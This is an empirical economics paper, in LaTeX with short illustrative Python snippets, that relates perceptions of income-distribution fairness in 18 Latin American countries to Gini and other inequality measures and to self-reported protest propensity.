In Section \ref{sec_corr_fairness}, we assess whether the correlation between income inequality and fairness views is robust to controlling for observable variables and investigate which individual-level characteristics are predictive of fairness views. The relationship between unfairness views and the Gini coefficient is positive and statistically significant even after controlling for country fixed effects, year fixed effects, and a large set of individual-level characteristics. We find that older, unemployed, and left-wing individuals are more likely to perceive income distribution as very unfair. A decomposition exercise shows that the decline in unfairness perceptions during the 2000s is better accounted for by income inequality trends rather than changes in the composition of the population.
In Section \ref{sec_unrest}, we analyze the link between fairness perceptions and individuals' self-reported propensity to protest. A vast literature relates income inequality to social cohesion, conflict, and activism. One might expect this link to be partly mediated by fairness views. Hence, we study whether fairness views have predictive power for social unrest, conditional on income inequality. To do this, we measure individuals' likelihood of participating in different political activities, such as mobilizing in a demonstration, signing a petition, refusing to pay taxes, or complaining on social media. Participation in these activities is self-reported, so the results should be interpreted with caution. With this caveat in mind, we find that both fairness views and inequality have predictive power independent of each other for some political activities, such as complaining on social media. Other behaviors are exclusively predicted by fairness views (e.g., signing a petition) or by income inequality (e.g., refusing to pay taxes). This suggests that both fairness views and income inequality are important determinants of the propensity to engage in political activism.
This paper contributes to the literature that links objective measures of the income distribution to individuals' perceptions of such measures. Previous papers have shown that individuals tend to misperceive their relative incomes \citep{cruces2013biased, karadja2017richer, hvidberg2020social, fehr2021your} and other relevant features of the income distribution, such as the level of inequality, poverty, and mobility \citep{kuziemko2015elastic, page2016subjective, alesina2018intergenerational, preuss2020}.\footnote{Mismatches between beliefs and reality are important because there is mounting evidence that perceptions of facts, more than facts themselves, affect individual behavior. For example, demand for redistribution is affected more by perceptions of the income distribution than by the actual distribution \citep{gimpelson2018misperceiving, choi2019revisiting}. Thus, understanding what people believe about the income distribution is important from a policy perspective. If there are mismatches between perceptions and reality, interventions that make information less costly or more salient might be desirable.} Evidence on the relationship between fairness perceptions and income inequality, particularly in Latin America, is rather scarce. To our knowledge, the only other paper that studies the link between inequality and fairness views in the region is \cite{zmerli2015income}, although the focus of this paper is on political trust. Using the same data that we use, the authors find a positive association between unfairness views and the Gini. However, the authors only use data from one year. Hence, they cannot study the joint evolution of both variables over time or control for unobserved heterogeneity at the country or year level, which, as we argue below, could generate a spurious correlation between income inequality and fairness views. 
We contribute to this literature by providing novel empirical evidence linking fairness views to income inequality in a highly unequal region, but during a period of falling inequality.\footnote{A related literature exploits opinion surveys to study distributive issues in Latin America. \cite{cepal2010america} documents patterns of perceptions of distributive inequity during 1997--2007. Using data from Argentina, \cite{rodriguez2014percepciones} shows that people who consider their income to be fair tend to perceive lower levels of inequality. \cite{martinez2020latin} explore the effect of immigration on preferences for redistribution in Latin America.}
This paper also contributes to the literature on inequality measurement. This literature makes a crucial distinction between two types of inequality indicators: the relative ones (such as the Gini coefficient) and absolute ones (such as the variance). Relative and absolute indicators often provide different answers to important issues such as the distributive effects of globalization or trade openness \citep{ravallion2003debate, atkinson2010analyzing}. Hence, it is important to understand whether people think about distributive fairness through the lens of relative or absolute indicators. We show that relative indicators have a much stronger correlation with fairness views than absolute indicators.
Finally, we make a small contribution to the growing literature that relates income inequality---and more recently, measures of polarization---to conflict and political activism \citep{esteban2011linking, esteban2012ethnicity}. Previous papers have shown that income inequality is predictive of conflict and social unrest. We contribute to this literature by showing that fairness views have predictive power for social unrest above and beyond income inequality (and vice versa).
\section{Institutional Context, Data, and Descriptive Statistics} \label{sec_context_data}
This section provides institutional context on Latin America, describes our data, and provides summary statistics on our sample.
\subsection{Context} \label{subsec_context}
Latin America has long been characterized as a region with high levels of income inequality. Together with Sub-Saharan Africa, Latin America is one of the two most unequal regions in the world \citep{alvaredo2015recent,world2016poverty}. After a period of increasing inequality during the 1980s and 1990s, the region experienced a ``turning point'' in the 2000s, when income inequality saw a widespread decrease \citep{gasparini2011recent, gasparini2011rise, lustig2013declining}.\footnote{The widespread decline in inequality contrasts with what happened in other developing regions of the world, where inequality decreased only modestly (such as in the Middle East and North Africa) or even increased (such as in East Asia and Pacific, \citealp[c.f.][]{alvaredo2015recent}). In developed countries, inequality tended to increase \citep{atkinson2011top}.}
\subsection{Data} \label{subsec_data}
We use data on fairness views and income inequality from 18 Latin American countries over 1997--2015. The data comes from two harmonization projects, known as Latinobar\'ometro and SEDLAC (Socio-Economic Database for Latin America and the Caribbean).
We use public opinion polls conducted by Latinobar\'ometro to measure fairness perceptions. Latinobar\'ometro conducts opinion surveys in Latin American countries, interviewing about 1,200 individuals per country. The survey is designed to be representative of the voting-age population at the national level (in most Latin American countries, individuals aged 18 or older).\footnote{In Appendix Table \ref{tab-coverage} we show the percentage of the voting-age population represented by the opinion polls in our sample for the years in which fairness data is available.} The main variable for our empirical analysis is individuals' fairness views, which we measure using the following question: \textit{``How fair do you think the income distribution is in [country]? Very fair, fair, unfair or very unfair?''} We construct binary variables indicating whether individuals believe that the income distribution is unfair or very unfair.\footnote{Latinobar\'ometro does not ask respondents \textit{why} they believe that the income distribution is unfair. It is possible that some people view the distribution as unfair because existing disparities are not sufficiently large. We think that this is unlikely and interpret unfairness views as reflective of too much inequality.}
Income inequality data comes from SEDLAC, a joint project between CEDLAS-UNLP and The World Bank that harmonizes official household surveys to increase cross-country comparability. We measure inequality in household income per capita (measured in 2005 USD at purchasing power parity). Whenever possible, we use comparable annual household surveys to calculate inequality indicators. However, some countries do not conduct surveys every year, and some of the household surveys available in a given country are not comparable over time (usually due to important methodological changes). In Appendix \ref{sec_data} we describe the partial fixes we implement to maximize the sample size. In two countries in our sample (Argentina and Uruguay), the household survey is representative of urban areas only.
\subsection{Sample and Summary Statistics} \label{subsec_sample}
For our regression analysis, we use individual-level data. Our sample includes all individuals in the 11 different waves of Latinobar\'ometro surveys over 1997--2015.
Appendix Tables \ref{tab-sum-stats} and \ref{tab-fairness-grp} show descriptive statistics on our sample. The average respondent is 39.7 years old. Roughly half of the respondents are men (49\%), over half (56.3\%) are married or in a civil union, and 68\% are Catholics. The majority of respondents (76\%) completed at least elementary school, while a third of them (33.6\%) had completed high school or more. Almost two-thirds of the sample (64\%) were part of the labor force, and 9.9\% of the economically active individuals were unemployed.\footnote{In Appendix \ref{app_lb_sedlac}, we show that Latinobar\'ometro's sample is similar to the sample in SEDLAC.}
\section{The Relationship between Fairness Views and Inequality} \label{sec_ineq_fairness}
This section first provides descriptive evidence on the evolution of fairness views in Latin America from 1997 to 2015. Then, we link fairness perceptions to income inequality both across countries and over time. Finally, we investigate whether absolute or relative inequality indicators have a stronger predictive power for fairness views.
\subsection{The Evolution of Fairness Views in Latin America during the 2000s}
Figure \ref{fig-fairness-views} shows how fairness views evolved over time (Panel A) and across countries (Panel B). Panel A plots the fraction of individuals who believe that the income distribution of their country is very unfair, unfair, fair, or very fair over 1997--2015, pooling across all countries in our sample. Panel B shows the fraction of individuals who believe that the income distribution is either unfair or very unfair in each country of our sample in 2002 and 2013.
Figure \ref{fig-fairness-views}, Panel A shows that a strikingly high, albeit decreasing, share of the population believes that the distribution of income is unfair. In 2002, almost nine out of ten individuals perceived the income distribution as unfair (86.6\%). By 2015, this figure declined to 75.1\%. The decrease in unfairness perceptions was driven mainly by individuals with strong beliefs about unfairness (i.e., individuals who believe that the income distribution was very unfair). While in 2002, 33.1\% of the population perceived the income distribution as very unfair, this figure declined to 25.8\% by 2015. In contrast, weak beliefs about unfairness (i.e., individuals who believe that the income distribution was merely unfair) behaved more erratically, increasing at the beginning of our sample and decreasing by the end of the period. Overall, the share of individuals with weak beliefs about unfairness slightly declined during the 2000s, from 53.5\% in 2002 to 49.2\% in 2015. On the other hand, the share of the population that believes that the income distribution is fair doubled from 11.3\% in 2001 to 22.6\% in 2015.
Figure \ref{fig-fairness-views}, Panel B shows that, while most individuals perceive the income distribution as unfair, fairness perceptions improved in most countries during 2002--2013. A substantial share of the population in all countries perceived the income distribution as unfair in both 2002 and 2013. For example, in 2002, the share of the population that perceived the distribution as unfair ranged from 74.5\% in Venezuela to 97.7\% in Argentina (which, at the time, was in the midst of a severe economic crisis). Throughout the following decade, there was a widespread decrease in the share of the population that perceived income inequality as unfair or very unfair. Compared to 2002, in 2013, a lower fraction of the population perceived the income distribution as unfair in 16 out of the 18 countries in our sample. The change in fairness perceptions ranged from modest decreases, as in Chile, where the decline was less than one percentage point, to remarkable reductions, as in Ecuador, where perceptions about unfairness declined from 87.5\% to 38.6\%.
Appendix Figure \ref{fig-fairness-grps} shows that the decline in unfairness perceptions was widespread across heterogeneous groups of the population. To show this, we study how fairness views evolved for different subgroups of the population, according to individuals' age, gender, education, and employment. This analysis reveals that young individuals are less likely to perceive the income distribution as unfair (Panel A), while females are more likely to do so, although with some heterogeneity across time (Panel B). Similarly, individuals with higher educational attainment (Panel C) and the unemployed (Panel D) are more likely to believe that the income distribution is unfair. Importantly, the perception of unfairness consistently fell across all these subpopulations during the 2000s.
Next, we explore the extent to which these changes in fairness views were accompanied by changes in the actual distribution of income.
\subsection{Fairness Perceptions and Income Inequality: Some Stylized Facts}
Figure \ref{fig-fairness-gini} shows how fairness views evolved vis-\`a-vis changes in income inequality. Panel A shows a binned scatterplot of the Gini coefficients and unfairness views for all country-years in our sample. Panel B plots the percentage point change in unfairness perceptions between 2002 and 2013 on the $y$-axis against the change in the Gini over the same period on the $x$-axis.
Panel A shows that unfairness perceptions and income inequality are strongly correlated across country-years. The linear correlation between the Gini and unfairness perceptions across country-years is $0.93$ ($p < 0.01$). The share of the population that perceives the income distribution as unfair or very unfair ranges from 63\% in country-years with a Gini in the 0.40 bin (roughly, the average level of inequality in Venezuela during the 2000s), to 88\% in country-years with a Gini in the 0.60 bin (roughly, the level of inequality in Honduras during the early 2000s).\footnote{An OLS regression of unfairness views on the Gini estimated on the plotted points yields an intercept of 28.2. This implies that, even in a society where all incomes are equalized, about 28\% of the population would still perceive the income distribution as unfair. This exercise relies on the strong assumption that the relationship between fairness views and income inequality is linear. While such a relationship indeed appears to be linear in Panel A, our data only covers a very narrow range of Gini coefficients (between 0.40 and 0.60). It is likely that the relationship is non-linear for Gini coefficients close to zero or one.} The correlation between unfairness views and the Gini is driven by individuals who perceive inequality as very unfair. The correlation between perceptions of a very unfair distribution and the Gini is sizable and statistically significant. In contrast, the correlation between perceptions of a merely unfair distribution and the Gini is small and indistinguishable from zero.
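The back-of-the-envelope intercept exercise in the footnote can be replicated mechanically. The sketch below uses invented (Gini, unfairness) points spanning the 0.40--0.60 range our data covers---not the actual binned values---so the fitted slope and intercept are illustrative only:

```python
import numpy as np

# Illustrative country-year points: Gini on the x-axis, share (%) perceiving
# the income distribution as unfair on the y-axis. Numbers are invented.
gini = np.array([0.40, 0.45, 0.50, 0.55, 0.60])
unfair = np.array([63.0, 69.0, 76.0, 82.0, 88.0])

# OLS of unfairness on the Gini. The intercept is the share that would
# perceive the distribution as unfair at a Gini of zero, under the (strong)
# assumption that the linear fit extrapolates outside the observed range.
slope, intercept = np.polyfit(gini, unfair, 1)
```

With these invented points the fit is nearly exact; with real binned data the extrapolated intercept should be read with the same caution the footnote spells out.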
Panel B shows that the evolution of fairness views tends to mirror the evolution of income inequality at the country level. Fairness views moved in the same direction as the Gini in 17 out of the 18 countries in our sample. The one exception is Honduras, where, despite falling inequality, the population perceived the distribution as more unjust. Most countries lie in the third quadrant, where both the Gini and unfairness perceptions decreased. The only country where inequality increased, Costa Rica, also saw an increase in unfairness beliefs. In Appendix Figure \ref{fig-timeseries-gini-unfair} we show that the correlation between the Gini and unfairness views over time is also strong when pooling across countries. In this case, the linear correlation is equal to 0.80 ($p < 0.01$). During 2002--2013, a one percentage point decrease in the Gini was associated with a 1.4 percentage point decrease in the share of the population perceiving the distribution as unfair. To put this figure in context, this means that, at the pace of inequality reduction of the 2000s, it would take Latin America more than a decade to reduce the share of the population that perceives income inequality as unfair to 50\%.
\subsection{Is Fairness Absolute or Relative?} \label{sec_abs_fairness}
The literature on inequality measurement makes a crucial distinction between two types of indicators: relative ones (such as the Gini) and absolute ones (such as the variance). Relative indicators satisfy the scale-invariance axiom, while absolute indicators satisfy the translation-invariance axiom.\footnote{These two axioms yield different implications for how inequality responds to a proportional change in the income of the entire population. A proportional income increase does not change income inequality as measured by relative indicators, but can provoke a large increase in inequality as measured by absolute indicators.} The question of which indicator should be used in practice has led to a heated debate in the literature \citep{milanovic2016global}. This is because relative and absolute indicators often provide different answers to important issues such as the distributive effects of globalization or trade openness.\footnote{As measured by absolute indicators, globalization has deteriorated the income distribution since the absolute income difference between the rich and the poor has increased. However, under the lens of relative measurement, globalization reduced income inequality since the poor's income has grown proportionally more than the income of the rich.}
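Both axioms are easy to verify numerically. The following minimal sketch, using a made-up four-person income vector (not data from our sample), checks that the relative Gini is unchanged by a proportional income increase, while the variance and the absolute Gini are unchanged by a lump-sum addition:

```python
import numpy as np

def gini(x):
    """Relative Gini coefficient via the mean absolute difference."""
    x = np.asarray(x, dtype=float)
    n = x.size
    mad = np.abs(x[:, None] - x[None, :]).sum()  # sum over all ordered pairs
    return mad / (2 * n**2 * x.mean())

def absolute_gini(x):
    """Absolute Gini = relative Gini scaled by mean income."""
    return gini(x) * np.mean(x)

incomes = np.array([100.0, 200.0, 300.0, 400.0])

# Scale invariance: doubling every income leaves the relative Gini unchanged,
# but doubles the absolute Gini and quadruples the variance.
assert np.isclose(gini(2 * incomes), gini(incomes))
assert np.isclose(absolute_gini(2 * incomes), 2 * absolute_gini(incomes))
assert np.isclose(np.var(2 * incomes), 4 * np.var(incomes))

# Translation invariance: a lump-sum addition of 50 to every income leaves
# the variance and the absolute Gini unchanged, but lowers the relative Gini.
assert np.isclose(np.var(incomes + 50), np.var(incomes))
assert np.isclose(absolute_gini(incomes + 50), absolute_gini(incomes))
assert gini(incomes + 50) < gini(incomes)
```

The last line is the relative-indicator view of a uniform transfer: absolute gaps are intact, but they shrink as a share of the (now higher) mean income.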
To shed some light on this debate, we assess whether people think about distributive fairness through the lens of relative or absolute indicators. To do this, we take a data-driven approach. We calculate 13 different measures of income inequality for all the countries in our sample and correlate each inequality indicator with the share of the population that believes income distribution is unfair over time.\footnote{The indicators are the Gini coefficient, the ratio between the 75th percentile and the 25th percentile of the income distribution, the ratio between the 90th and 10th percentile, the Atkinson index with an inequality aversion parameter equal to 0.5 and 1, the mean log deviation, the Theil index, the Generalized entropy index, the coefficient of variation, the absolute Gini, the Kolm index with an inequity aversion parameter equal to one, and the variance of the per capita household income (in 2005 PPP). These last three indices correspond to the absolute inequality measures, while the other ten indicators are relative inequality measures.}
We calculate the correlation between unfairness perceptions and each inequality indicator at the regional level using three alternative aggregation methods. First, we calculate each correlation using the individual-level data and pooling all countries and years in our sample (columns 1--3). Second, we calculate the average unfairness views in each country-year and then calculate the correlation between each inequality indicator and the average fairness views in the corresponding country-year (columns 4--6). Third, we calculate the correlation between each inequality indicator and fairness views over time for each country separately (using the individual-level data) and then average the correlations across countries (columns 7--9). Table \ref{tab-rel-fairness} shows the results.
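To make the three aggregation schemes concrete, the sketch below builds a toy country-year panel (all numbers invented, standing in for the Latinobar\'ometro--SEDLAC merge, with the share of ``unfair'' responses constructed to rise with the Gini) and computes each of the three correlations:

```python
import numpy as np
import pandas as pd

# Toy panel: three countries, three years, illustrative Gini values, and a
# deterministic count of "unfair" responses equal to 400 * (0.3 + Gini).
frames = []
for country, base in zip(["A", "B", "C"], [0.55, 0.50, 0.45]):
    for year, drop in zip([2002, 2008, 2013], [0.00, 0.02, 0.04]):
        g = base - drop
        n_unfair = round(400 * (0.3 + g))  # 400 respondents per country-year
        unfair = np.r_[np.ones(n_unfair), np.zeros(400 - n_unfair)]
        frames.append(pd.DataFrame(
            {"country": country, "year": year, "gini": g, "unfair": unfair}))
df = pd.concat(frames, ignore_index=True)

# (1) Pool the individual-level data across all countries and years.
pooled = df["unfair"].corr(df["gini"])

# (2) Average unfairness within each country-year, then correlate the
#     country-year means with the corresponding Gini.
cy = df.groupby(["country", "year"], as_index=False)[["unfair", "gini"]].mean()
country_year = cy["unfair"].corr(cy["gini"])

# (3) Correlate over time within each country, then average across countries.
within = np.mean([d["unfair"].corr(d["gini"]) for _, d in df.groupby("country")])
```

Because the toy unfairness share is linear in the Gini by construction, the country-year correlation is essentially one; with survey data, individual-level noise pushes the pooled and within-country correlations well below the aggregated one.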
Fairness views tend to be positively correlated with relative indicators and negatively correlated with absolute ones. In Table \ref{tab-rel-fairness}, column 1 shows that the Gini is the indicator with the highest linear correlation. On the other hand, the absolute indicators of inequality tend to be \textit{negatively} correlated with unfairness perceptions, and the magnitude of such correlations tends to be small. The high correlation between unfairness perceptions and income inequality seems to be driven by the population that perceives inequality as very unfair (columns 2, 5, and 8), rather than just unfair (columns 3, 6, and 9).\footnote{It is interesting to note that indicators sometimes mentioned in the mass media, such as the ratio between the 90th and 10th percentiles, exhibit low explanatory power. This may be due to mismeasurement of top incomes in household surveys.}
These results are consistent with experimental evidence from \cite{amiel1992measurement,amiel1999thinking}, who show that support for the scale-invariance axiom is greater than for translation invariance, reflecting greater support for relative inequality indicators.
\section{Individual-level Fairness Determinants} \label{sec_corr_fairness}
In this section, we study the individual-level correlates of fairness views. The purpose of this section is twofold. First, to assess whether the association between fairness views and income inequality is robust to including controls. Second, to investigate which individual-level characteristics are systematically related to fairness views.
\subsection{Empirical Design}
To assess the relationship between individuals' characteristics and fairness perceptions, we estimate two-way fixed effects Logit models. This design controls for two important sources of heterogeneity that could drive the positive association between inequality and fairness perceptions documented in the previous section. First, it controls for country-level heterogeneity. This could matter if, for example, countries with historically extractive institutions have both higher levels of income inequality and more negative fairness views as a legacy of such institutions. Insofar as institutions are stable over time, the country fixed effects deal with this potential bias. Second, the design controls for year-level heterogeneity. This is important if, for example, in some particular years, macroeconomic events such as a financial crisis or a corruption scandal increase income disparities and worsen fairness views, again generating a spurious correlation between inequality and fairness perceptions. Including year fixed effects helps to alleviate such concerns.
Given that changes in fairness views over the last decade were driven by the share of the population that perceived the income distribution as very unfair (Figure \ref{fig-fairness-views}), in our baseline specification, we focus on explaining the determinants of this variable, although we also show the results for a broader definition of unfairness. We assume that unfairness perceptions can be characterized according to the following equation:
\begin{align} \label{eq_fairness}
\text{VeryUnfair}_{ict} = F(\lambda_c + \lambda_t + \gamma \text{Gini}_{ct} + \beta x_{ict}),
\end{align}
where the dependent variable, $\text{VeryUnfair}_{ict}$ is equal to one if individual $i$ believes that the income distribution of country $c$ during year $t$ is very unfair and zero otherwise. Equation \eqref{eq_fairness} includes country fixed effects, $\lambda_{c}$; year fixed effects, $\lambda_t$; the country's Gini coefficient in year $t$, $\text{Gini}_{ct}$; and a vector of individual characteristics, $x_{ict}$, that contains age, age squared, sex, marital status, education, employment status, an assets index, political ideology, and religious views.\footnote{The assets index takes the value one if individual $i$ has access to running water and sewerage, owns a computer, a washing machine, a telephone, and a car. In household surveys, these variables tend to be correlated with household income, although the correlation is usually small. Unfortunately, we do not observe household income in the Latinobar\'ometro data. To measure political views, we rely on the question \textit{``In politics, people normally speak of ``left'' and ``right.'' On a scale where 0 is left and 10 is right, where would you place yourself?''} We interpret values closer to zero (ten) as closer to a liberal (conservative) worldview. We measure religious views using a dummy that is equal to one if individual $i$ is a Catholic ---the predominant religion in the region---coding other religions (and lack of religion) as zero.} In our baseline specification, $F(\cdot)$ is the logistic function. We cluster the standard errors at the country-by-year level.
We are interested in $\frac{\partial \text{VeryUnfair}_{ict}}{\partial x_{ict}} = \beta f(\cdot)$ and $\frac{\partial \text{VeryUnfair}_{ict}}{\partial \text{Gini}_{ct}} = \gamma f(\cdot)$. The first of these partial derivatives captures the relationship between an individual characteristic and unfairness perceptions, controlling for the rest of the characteristics, the Gini, and the fixed effects. Similarly, $\gamma f(\cdot)$ measures the relationship between the Gini and perceived fairness after controlling for individual-level traits and fixed effects. The magnitude of the partial derivatives depends on the value at which covariates are evaluated. We compute the marginal effects by evaluating all covariates at their average value.
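As a numerical illustration of these marginal effects (a minimal sketch on synthetic data with made-up coefficients, not our estimates), one can fit the logit by Newton--Raphson and evaluate $\gamma f(\bar{x}'\hat{\beta})$ at the covariate means:

```python
import numpy as np

def fit_logit(X, y, iters=25):
    """Newton-Raphson maximum likelihood for a logit (minimal sketch)."""
    beta = np.zeros(X.shape[1])
    for _ in range(iters):
        p = 1.0 / (1.0 + np.exp(-X @ beta))        # F(x'beta)
        grad = X.T @ (y - p)                        # score vector
        hess = (X * (p * (1 - p))[:, None]).T @ X   # information matrix
        beta += np.linalg.solve(hess, grad)
    return beta

rng = np.random.default_rng(1)
n = 20_000
# Synthetic respondents: a Gini in the range observed in our sample
# (0.40-0.60) plus one extra covariate; the coefficients below are invented.
gini = rng.uniform(0.40, 0.60, n)
age = rng.uniform(18, 80, n) / 100
X = np.column_stack([np.ones(n), gini, age])
true_beta = np.array([-3.0, 6.0, 0.5])
y = (rng.uniform(size=n) < 1 / (1 + np.exp(-X @ true_beta))).astype(float)

beta_hat = fit_logit(X, y)

# Marginal effect of the Gini at the covariate means:
# dP/dGini = gamma * f(x_bar' beta), with f = F(1 - F) the logistic density.
x_bar = X.mean(axis=0)
F = 1 / (1 + np.exp(-x_bar @ beta_hat))
me_gini = beta_hat[1] * F * (1 - F)
```

Note that the marginal effect scales the coefficient by the logistic density at the evaluation point, which is why the same $\hat{\gamma}$ implies smaller effects when predicted probabilities are near zero or one.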
\subsection{Regression Results}
Table \ref{very_unfair_logit} shows the estimated marginal effects under different specifications. Column 1 presents the results controlling only for the fixed effects and the Gini coefficient. Column 2 includes basic demographic indicators (age, gender, and marital status). Column 3 includes dummies for maximum educational attainment (the omitted category is completing up to elementary school). Column 4 includes dummies for labor force participation and unemployment. Column 5 includes an index for access to basic services and asset ownership. Column 6 includes political and religious views.
Consistent with the evidence shown in Section \ref{sec_ineq_fairness}, the Gini is positively and statistically significantly related to unfairness perceptions. In a country with average characteristics, a one point decrease in the Gini (from 0.49 to 0.48) decreases the share of the population that believes that the income distribution is very unfair by about half a percentage point ($p < 0.01$). This magnitude does not vary much across specifications (columns 1--6).\footnote{It is important to stress that the interpretation is not necessarily causal. The relationship between income inequality and unfairness perceptions can go both ways. On the one hand, higher inequality can increase the share of the population that believes the distribution is very unfair. But as more people perceive inequality as very unfair, the income distribution can change through several channels (e.g., more corruption or social unrest).}
Several individual-level characteristics predict fairness views. Older people are more likely to perceive the income distribution as very unfair, although the relationship between age and unfairness perception is non-linear. On average, males are just as likely as females to perceive the income distribution as very unfair, while married individuals are slightly less likely to do so. Completing high school is negatively associated with perceptions of unfairness, although the magnitude of the coefficient is small. Being economically active does not seem to be correlated with unfairness views, but being unemployed does. On average, unemployed individuals are about two percentage points more likely to perceive the income distribution as unfair than the employed population. The coefficient on the assets index is negative, suggesting that relatively better-off individuals are less likely to view the income distribution as very unfair, although the coefficient is not statistically different from zero. Ideologically conservative people are statistically less likely to perceive the income distribution as very unfair, although the effect size is small (below half a percentage point). Finally, Catholics are less likely to perceive the income distribution as very unfair.
\subsection{Robustness}
We conduct three robustness checks. First, we use a broader measure of unfairness that equals one if an individual perceives the income distribution as unfair \textit{or} very unfair as the dependent variable in equation \eqref{eq_fairness}. Appendix Table \ref{unfair_logit} shows the results. The magnitude of the coefficient on the Gini is smaller relative to our baseline specification. Given the relatively large standard errors, the 95\% confidence interval on the Gini includes zero; but the interval also contains the estimated marginal effects in our baseline set of regressions (Table \ref{very_unfair_logit}). In other words, when we use the broader measure of unfairness, our estimates become less informative. This is because strong unfairness views are more strongly correlated with income inequality than weak unfairness views (Table \ref{tab-rel-fairness} and Figure \ref{fig-fairness-gini}).\footnote{The coefficients of some individual-level characteristics are also different when using the broader definition of unfairness views. The effect of completing college on perceptions of unfairness becomes strong and statistically significant. Marital status stops being statistically significant, while the male dummy becomes negative and statistically significant (in both cases consistently so across specifications). The coefficient on the assets index becomes larger and statistically different from zero. Finally, the effect of political ideology and religious views becomes statistically indistinguishable from zero. These results suggest that the population that perceives the income distribution as very unfair tends to differ in observable characteristics from the population that believes that the income distribution is merely unfair.}
As a second robustness check, we estimate an analogous specification to the one in column 6 of Table \ref{very_unfair_logit}, but controlling for inequality indicators other than the Gini coefficient. Appendix Table \ref{unfair_ineq_logit} shows the results. We find a positive correlation between income inequality and unfairness perceptions across all relative measures of inequality (columns 1--4). The Gini calculated without households with zero income, the Atkinson index, the Theil index, and the Generalized Entropy indicator are consistently correlated with unfairness, and all the coefficients are statistically different from zero at the usual levels. In contrast, the absolute Gini (the only absolute inequality indicator in the table) is negatively correlated with unfairness perceptions, although the coefficient is statistically indistinguishable from zero.
As a final robustness check, we estimate equation \eqref{eq_fairness} using a linear probability model (LPM) instead of a Logit. The choice of a LPM is consistent with the visual evidence shown in Figure \ref{fig-fairness-gini}, Panel A, where fairness views seem to be linearly related to the Gini coefficient. Appendix Table \ref{very_unfair_lpm} shows the results. The LPM estimates are quite similar to the Logit ones across specifications. For example, in the specification with the largest set of controls (column 6), the marginal effect of the Gini coefficient is 0.68 in the Logit model and 0.63 in the LPM.
\subsection{Decomposing Changes in Fairness Views Over Time}
Both income inequality and individual-level characteristics are associated with fairness perceptions. Next, we ask which of these two factors mainly explain (in an accounting sense) the reduction in unfairness beliefs over the 2000s. To do this, we perform a Oaxaca-Blinder decomposition, taking 2002 and 2013 as the two groups to be compared (see Appendix \ref{sec_oaxaca} for details on the Oaxaca-Blinder decomposition). In the decomposition, we use the broad definition of unfairness perceptions as the dependent variable and include controls for demographics, educational attainment, employment status, assets, political views, and religion. Figure \ref{fig-oaxaca} summarizes the results.
During 2002--2013, the share of the population perceiving the distribution as unfair decreased 14 percentage points, from 87\% to 73\%. The decomposition suggests that about 28\% of this change (4 percentage points) is accounted for by changes in the sensitivity of fairness views to each covariate (i.e., changes in the values of the regression coefficients), while the other 72\% can be explained by changes in the values of the covariates. Among the covariates included in the decomposition, the one that mainly explains the decline in unfairness perceptions is the change in the Gini, which accounts for 88.9\% of the explained component. In contrast, changes in the composition of the population only account for 11.1\% of the explained component. This result suggests that the decline in unfairness views during the 2000s in Latin America was mainly driven by changes in income inequality and not by changes in the composition of the population.
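For reference, in the linear case the two-fold decomposition splits the change in average unfairness views into an explained (covariate values) and an unexplained (coefficients) component. A standard textbook formulation, taking the 2002 coefficients as the reference, is
\begin{align*}
\bar{Y}_{2013} - \bar{Y}_{2002} =
\underbrace{\left(\bar{x}_{2013} - \bar{x}_{2002}\right)'\hat{\beta}_{2002}}_{\text{explained: covariate values}}
+ \underbrace{\bar{x}_{2013}'\left(\hat{\beta}_{2013} - \hat{\beta}_{2002}\right)}_{\text{unexplained: coefficients}},
\end{align*}
where $\bar{Y}_t$ is the average unfairness perception in year $t$, $\bar{x}_t$ is the vector of covariate means (including the Gini), and $\hat{\beta}_t$ are the year-$t$ coefficient estimates. The choice of reference coefficients can matter; Appendix \ref{sec_oaxaca} states the exact variant we implement.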
\section{The Predictive Power of Fairness Views for Social Unrest} \label{sec_unrest}
There is a vast literature that relates economic inequality---and more recently, measures of polarization---to social cohesion, conflict, and activism.\footnote{For instance, \cite{gasparini2008income} find a strong empirical correlation between inequality and conflict in Latin America. Most previous studies linking inequality and conflict are based on cross-country regressions, and therefore have a notably smaller sample size than our paper.} Arguably, the relationship between income inequality and conflict is partly mediated by fairness views. That is, many individuals mobilize in part because they believe existing inequities are unfair. However, a given level of income inequality might not be seen as unfair by some individuals due to, for example, misperceptions of the actual level of inequality \citep{gimpelson2018misperceiving} or a perception that income gaps are mainly driven by differences in effort \citep{alesina2001doesn}. For these reasons, a regression that links social unrest to income inequality can contain substantial measurement error. We sidestep these issues by directly measuring the link between social unrest and fairness views.
We measure propensity to engage in social unrest using the opinion polls data. For several political activities, Latinobar\'ometro asks respondents whether they (i) have ever done the activity; (ii) would do the activity; or (iii) would never do the activity. We investigate eight different types of demonstrations: making a complaint on social media, making a complaint to the media, signing a petition, protesting with authorization, protesting without authorization, refusing to pay taxes, participating in riots, and occupying land, factories or buildings. We also create a composite index of political participation that takes the value one if the individual engaged in tax evasion or an illegal protest, signed a petition, or complained to the media, and zero otherwise.\footnote{We use those four measures to construct the index because we do not have data on the other political activities during 2015. Other years have data on fewer political activities.} Participation in these activities is self-reported. Given that respondents had no financial incentives for truth-telling, our results should be taken with caution.
For each activity (and the index), we consider two measures of social unrest. First, we use an indicator that takes the value one if an individual says she has done the activity in the past and zero otherwise. Second, we use an indicator that takes the value one if the individual did the activity in the past \textit{or} says that she is willing to do the activity. We use these measures as dependent variables in Logit regressions. The regressions control for unfairness perceptions, the Gini, and individual-level covariates. Unfortunately, participation in political activities is available only in a few years, so our sample size for these regressions is substantially smaller.
Table \ref{very_unfair_unrest_past}, Panel A shows that unfairness perceptions correlate with participating in political activities in the past. We find positive and statistically significant effects for complaining on social media (column 1) and signing a petition (column 3). Conditional on income inequality, individuals who perceive the income distribution as very unfair are 1.6 percentage points more likely to have complained through social media in the past (from a baseline of 7.8\%) and 1.3 percentage points more likely to have signed a petition in the past (from a baseline of 18.6\%). The rest of the effects tend to be positive, although not statistically different from zero. Conditional on fairness views, we find a statistically significant correlation between the Gini and complaining on social media (column 1), taking part in an unauthorized demonstration (column 5), and the composite index (column 9). The effect of income inequality on the rest of the activities is statistically indistinguishable from zero.
Table \ref{very_unfair_unrest_past}, Panel B shows the results when the dependent variable also includes the willingness to participate in the political activities. The set of political activities predicted by fairness views is somewhat different from that in Panel A. In Panel B, we find positive and statistically significant effects for complaining through media (either social media or traditional media, columns 1 and 2, respectively) and refusing to pay taxes (column 6). The magnitude of the coefficients that are statistically significant tends to be larger than in the baseline specification. For example, the effect of unfairness views on the propensity to complain on social media is twice as large in Panel B as in Panel A (3.3 vs. 1.6 percentage points, respectively). Finally, we find that---holding fairness views constant---income inequality is predictive of refusing to pay taxes (column 6). The effect of income inequality on the rest of the political activities is not statistically different from zero.
